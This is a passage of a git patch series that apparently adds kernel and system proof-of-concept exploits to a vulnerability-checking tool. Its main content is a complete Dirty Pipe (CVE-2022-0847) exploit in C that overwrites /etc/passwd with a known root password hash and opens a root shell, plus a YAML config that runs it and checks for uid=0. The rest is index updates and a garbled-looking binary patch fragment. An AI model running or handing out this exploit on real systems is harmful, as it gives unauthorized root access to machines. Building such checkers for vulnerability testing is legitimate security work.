zdR^<tyq$IJ>AF^bozGv_)KRBF5BeQ-wKBdpU_J~#){H{Vto8Oy&_Uq#^{W)#zT9qs
z+bwXr1#Y*%?H0J*0*)5o{bk-yR<9j+U$+vibSUjpo1wJuqBN{FBYBUP_pR@-#HH^F
zcPpOvukUrq-@jE%5_Cd6%z01Or!u^kJE7#f_qtF8$a}7h%I`8onP4R)Q<K`y<adVG
zls&&M@!l}+WsfU>@slbLekY>$H%h!m%;nRvn-c5cbwt(=#YqTDWXTUIe^>^xT-r@3
z{vjpDT2IQk9#ZKyc;WB8ZkNxgioKxdw-tR^(Q}IaOwqR#y{_n7)lth8{g|Sg6zx>>
z2}Prd9#-@@MPE?#+lsp5{4k!shdjJ}`xdRKr#G80v)X3wMz62=!K~!geQI5+*SBG<
zg?^YnlG7I+{;qG=r|(7lJ=}>`36lq&O;CmJLOkwmF#OjD9`8<kuHgH^iO&-}UYvNX
z;Bn@}?+`qmo%npg<KBtiS-St7_yUnq{q4jTikHgtSCyzMoxgDE*O%rKC*B~&)jZ?G
z7nRNrIPt~eHNK&3f-143^j*ycqn($QzN<O$WjGh1*&&&)63Ye8BX(hxz^tK_({BV^
z4(C~O#tThH)#AU4Gl-R=`F9T5ZOYZ2^x=VUA5VbF@IHm}e6C=z85s}0`!=a~s60xY
z_<72-!vJvd&(8<ar8I<}r%ZdE0A4Qs7lD(X3o6c6!BhG^eiTo;iiba#Qe5TyoRRvA
zMYa7SBrr<l^e1q?QMoBKe(Eh%@%NH0nbq%?fqTU4elI9}e!fW-7g}r5mvlbQB3WGO
zQ2|exak2*ZV#IS$#lzFVMv1fa4Ap^aGi)jM7!0*C<1JFb&*2LAu?jeDin8Yh{uKHR
zD7Qg#M)l1Kep)0x`@Vj;g8qdH_*)h5Usb^GMElskhjPPxv;yv{fbRlM^>yFZ`++-K
zz$)Po@I`YzBKUd3<qi@KPdty&)(EBNfzx=H!sjSTa!&;GD-xHG<MIn|4RpWwGzZ?J
z{P4Lp-V6FG;H2;FuOBG=&#M<ZxmN>^=PQ&;pHCLgnSCFftDyh$3i!1OIBnvT>#rpk
zht!_#_*VjVwt&?fZNOJKTE=3&DE-fVe)Uus=kx`-?D?2*+RT{QXw(}PGsjDU=0FgK
zTM`DHiHRhGeeq;(C?1Sp4>J=CWd{Xz7gKS=G$P*3o7!5-E79qfSTK}MhlYYi!b}f|
zXgV}t1S8pjfgw8iGQ$O-X*yK5KM`nN?_0mV+1I*ZGh$1njZ`RY1m&5XUc_spy&KlA
zqoO<a_;&_^fk$@)arVXODI$V9e(zEL&aUlFiQK0Kgwt%nfUZ2~JNAg+!`-_&{N2G_
zot=*d_6GO*JGukpRi4`kXR@+R*0G@Wc0RN7VdrzKedQVbjq<e73{Up*fRGak8j+A0
zQm2fZBI_)Y6LTM4nvrg>PB6^?R3J5^6Oo6SoDdy$aw4;iFuBDPvvm{+&E`Cp6pUn&
z!G3H?)0w5NUC@fe62WW++xxZ_rlA1dIv3^k-kZrN=X`uho}QBDxtzMzxh^M0C%~MD
zby~}b1%o(U#p8*NU6nmc<vif!^dJwJIU(zim=hD;%+P=t>IF5^7VYO;EP+#ADdEM}
z4a4j2=xR1YeTwT#WWBxF7>;trBEm~te<;&0ypf><{8`jYTav>@I)lx92NQ%WZNx)l
zpmM3WDZH}by~uj|l3-0^5Ldc~p_G(E(QEXpyS6_9C(K!<*6nLqa2_Ru24Z2vL?hXY
z-V<K>FoEfy%$)ZBfoNThM<(8htkkM9OnF_d#8Q{@MDNFs*1~Mh>l~&UWcI|*ImXr@
zW4Gt^5YyGHsHoe12XK6PNOJinRE8<r^Zo&^zuE1h$j~b&+fS$r)0E<A*-h=l_PnmA
z^QL$-l<avO#+3IXpdu6bu%{=%&|06%=k*%X4N95gXFaBeAg8?p=6PMmv|ZV|<5#da
ziVU?W+w=O5Deq@+`R@9ER@rwbhrCW?%KIr~Pp{~1`!4{aHc{IerS&B5EAhSyRAi!9
z?I{PwZqMsZrtPi<SFcrg2eQ(aUG}^_Wy<j?^-}zdf6Zmj?^{e?;fg5-TrT_jbC><F
zS_d$7FQeV{{|jZ${m1W<O#g!gsz8pL%m1#+p4Tl*yIE0Dclocl?0KEd)ZPB>@?VEN
zty$?FqQvVdKA-Q_XP)Ul!iLsxY|s0Nz7^zcX1rP44A1ue3ITNy+w=OK|Nnvi&w;y<
z?YJLleM>`(?Rg)di4M#l@%>|Qv&(-Q0=s=_U7=YPT#nnG`6*;5CN7`%6&f^4LvuM$
zuqDLxef+3=UkR}?Y`@lplP)DYbqz5oZ`ULd4XVNDIpf8T+mGi@8s8kdWno=+H(B&)
ZmypY4UAkRdDpK?lwcxqMii*1J{}<`-+G79!

literal 0
HcmV?d00001

diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c
new file mode 100644
index 0000000..a1efbfe
--- /dev/null
+++ b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c
@@ -0,0 +1,179 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Copyright 2022 CM4all GmbH / IONOS SE
+ *
+ * author: Max Kellermann <max.kellermann@ionos.com>
+ *
+ * Proof-of-concept exploit for the Dirty Pipe
+ * vulnerability (CVE-2022-0847) caused by an uninitialized
+ * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
+ * file contents in the page cache, even if the file is not permitted
+ * to be written, immutable or on a read-only mount.
+ *
+ * This exploit requires Linux 5.8 or later; the code path was made
+ * reachable by commit f6dd975583bd ("pipe: merge
+ * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
+ * there before, it just provided an easy way to exploit it.
+ *
+ * There are two major limitations of this exploit: the offset cannot
+ * be on a page boundary (it needs to write one byte before the offset
+ * to add a reference to this page to the pipe), and the write cannot
+ * cross a page boundary.
+ *
+ * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
+ *
+ * Further explanation: https://dirtypipe.cm4all.com/
+ */
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+	if (pipe(p)) abort();
+
+	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+	static char buffer[4096];
+
+	/* fill the pipe completely; each pipe_buffer will now have
+	   the PIPE_BUF_FLAG_CAN_MERGE flag */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		write(p[1], buffer, n);
+		r -= n;
+	}
+
+	/* drain the pipe, freeing all pipe_buffer instances (but
+	   leaving the flags initialized) */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		read(p[0], buffer, n);
+		r -= n;
+	}
+
+	/* the pipe is now empty, and if somebody adds a new
+	   pipe_buffer without initializing its "flags", the buffer
+	   will be mergeable */
+}
+
+int main() {
+	const char *const path = "/etc/passwd";
+
+        printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
+        FILE *f1 = fopen("/etc/passwd", "r");
+        FILE *f2 = fopen("/tmp/passwd.bak", "w");
+
+        if (f1 == NULL) {
+            printf("Failed to open /etc/passwd\n");
+            exit(EXIT_FAILURE);
+        } else if (f2 == NULL) {
+            printf("Failed to open /tmp/passwd.bak\n");
+            fclose(f1);
+            exit(EXIT_FAILURE);
+        }
+
+        char c;
+        while ((c = fgetc(f1)) != EOF)
+            fputc(c, f2);
+
+        fclose(f1);
+        fclose(f2);
+
+	loff_t offset = 4; // after the "root"
+	const char *const data = ":$1$antx-soc$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt antx-soc antx-soc
+        printf("Setting root password to \"antx-soc\"...\n");
+	const size_t data_size = strlen(data);
+
+	if (offset % PAGE_SIZE == 0) {
+		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
+	const loff_t end_offset = offset + (loff_t)data_size;
+	if (end_offset > next_page) {
+		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	/* open the input file and validate the specified offset */
+	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
+	if (fd < 0) {
+		perror("open failed");
+		return EXIT_FAILURE;
+	}
+
+	struct stat st;
+	if (fstat(fd, &st)) {
+		perror("stat failed");
+		return EXIT_FAILURE;
+	}
+
+	if (offset > st.st_size) {
+		fprintf(stderr, "Offset is not inside the file\n");
+		return EXIT_FAILURE;
+	}
+
+	if (end_offset > st.st_size) {
+		fprintf(stderr, "Sorry, cannot enlarge the file\n");
+		return EXIT_FAILURE;
+	}
+
+	/* create the pipe with all flags initialized with
+	   PIPE_BUF_FLAG_CAN_MERGE */
+	int p[2];
+	prepare_pipe(p);
+
+	/* splice one byte from before the specified offset into the
+	   pipe; this will add a reference to the page cache, but
+	   since copy_page_to_iter_pipe() does not initialize the
+	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+	--offset;
+	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+	if (nbytes < 0) {
+		perror("splice failed");
+		return EXIT_FAILURE;
+	}
+	if (nbytes == 0) {
+		fprintf(stderr, "short splice\n");
+		return EXIT_FAILURE;
+	}
+
+	/* the following write will not create a new pipe_buffer, but
+	   will instead write into the page cache, because of the
+	   PIPE_BUF_FLAG_CAN_MERGE flag */
+	nbytes = write(p[1], data, data_size);
+	if (nbytes < 0) {
+		perror("write failed");
+		return EXIT_FAILURE;
+	}
+	if ((size_t)nbytes < data_size) {
+		fprintf(stderr, "short write\n");
+		return EXIT_FAILURE;
+	}
+
+	char *argv[] = {"/bin/sh", "-c", "(echo antx-soc; cat) | su - -c \""
+                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
+                "cp /tmp/passwd.bak /etc/passwd;"
+                "echo \\\"Done! Popping shell... (run commands now)\\\";"
+                "/bin/sh;"
+            "\" root"};
+        execv("/bin/sh", argv);
+
+        printf("system() function call seems to have failed :(\n");
+	return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml
new file mode 100644
index 0000000..5f3a839
--- /dev/null
+++ b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml
@@ -0,0 +1,38 @@
+FormatVer: 20230308
+Id: CVE-2022-0847
+Belong: kernel
+PocHazardLevel: high
+Source: https://github.com/antx-code/CVE-2022-0847
+SiteInfo:
+    Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
+    Severity: high
+    Description:
+        DirtyPipe是自 内核版本5.8 以来 Linux 内核中的一个漏洞，允许覆盖任意只读文件中的数据。这会导致特权提升，因为非特权进程可以将代码注入根进程。
+    ScopeOfInfluence:
+        Linux kernel < 5.17-rc6.
+    References:
+        - https://nvd.nist.gov/vuln/detail/cve-2022-0847
+        - https://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+        CvssScore: 7.8
+        CveId: CVE-2022-0847
+        CweId: CWE-665, CWE-281
+        CnvdId: None
+        KveId: None
+    Tags:
+        - 权限提升
+SiteRequests:
+    Implement: 
+        ImArray:
+            - inter:
+              InterArgs :    
+              Exec : CVE-2022-0847
+              Args :
+        ExpireTime: 30
+        Inter:
+            - ">.:>>"
+            - "<<:id\n"
+            - ">.:\n"
+            - ">?:uid=0(root)"
+        Condition: None
\ No newline at end of file

From 8040010b7ae61d56295cb75787cacadf529dcd31 Mon Sep 17 00:00:00 2001
From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com>
Date: Thu, 9 Mar 2023 00:01:35 +0000
Subject: [PATCH 11/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20da?=
 =?UTF-8?q?ta/KernelPocs/CVE-2022-0847/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 data/KernelPocs/CVE-2022-0847/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 data/KernelPocs/CVE-2022-0847/.keep

diff --git a/data/KernelPocs/CVE-2022-0847/.keep b/data/KernelPocs/CVE-2022-0847/.keep
deleted file mode 100644
index e69de29..0000000

From 8b67eb3ba4c85ff36ff9b3957482bee0a8c88b77 Mon Sep 17 00:00:00 2001
From: yangjipeng <yangjipeng@kylinos.cn>
Date: Thu, 9 Mar 2023 11:29:14 +0800
Subject: [PATCH 12/13] Update info for Kernel and System main Pocs yaml file.

---
 data/KernelPocs/KernelPocs.yaml | 1 +
 data/SystemPocs/SystemPocs.yaml | 3 ++-
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/data/KernelPocs/KernelPocs.yaml b/data/KernelPocs/KernelPocs.yaml
index 1629446..ab60342 100644
--- a/data/KernelPocs/KernelPocs.yaml
+++ b/data/KernelPocs/KernelPocs.yaml
@@ -4,3 +4,4 @@ ExplorerItems:
     - ConfigFile: CVE-2021-22555/CVE-2021-22555.yaml
     - ConfigFile: CVE-2022-2588/CVE-2022-2588.yaml
     - ConfigFile: CVE-2022-2639/CVE-2022-2639.yaml
+    - ConfigFile: CVE-2022-0847/CVE-2022-0847.yaml
\ No newline at end of file
diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml
index 66408bf..3a45e12 100644
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@@ -12,4 +12,5 @@ ExplorerItems:
     - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
     - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
     - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
-    - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
\ No newline at end of file
+    - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
+    - ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml
\ No newline at end of file

From 1586ae0bcf54c2ebb13bfc4f95928ae6b3135e92 Mon Sep 17 00:00:00 2001
From: kascas <xpliang@buaa.edu.cn>
Date: Thu, 9 Mar 2023 13:39:10 +0800
Subject: [PATCH 13/13] correct CVE-2021-4043 to CVE-2021-4034

---
 .../{CVE-2021-4043 => CVE-2021-4034}/CVE-2021-4034.py           | 0
 .../CVE-2021-4043.yaml => CVE-2021-4034/CVE-2021-4034.yaml}     | 0
 data/SystemPocs/SystemPocs.yaml                                 | 2 +-
 3 files changed, 1 insertion(+), 1 deletion(-)
 rename data/SystemPocs/{CVE-2021-4043 => CVE-2021-4034}/CVE-2021-4034.py (100%)
 rename data/SystemPocs/{CVE-2021-4043/CVE-2021-4043.yaml => CVE-2021-4034/CVE-2021-4034.yaml} (100%)

diff --git a/data/SystemPocs/CVE-2021-4043/CVE-2021-4034.py b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.py
similarity index 100%
rename from data/SystemPocs/CVE-2021-4043/CVE-2021-4034.py
rename to data/SystemPocs/CVE-2021-4034/CVE-2021-4034.py
diff --git a/data/SystemPocs/CVE-2021-4043/CVE-2021-4043.yaml b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
similarity index 100%
rename from data/SystemPocs/CVE-2021-4043/CVE-2021-4043.yaml
rename to data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml
index 3a45e12..53c05b9 100644
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@@ -9,7 +9,7 @@ ExplorerItems:
     - ConfigFile: CVE-2022-1292/CVE-2022-1292.yaml
     - ConfigFile: CVE-2021-44142/CVE-2021-44142.yaml
     - ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml
-    - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
+    - ConfigFile: CVE-2021-4034/CVE-2021-4034.yaml
     - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
     - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
     - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml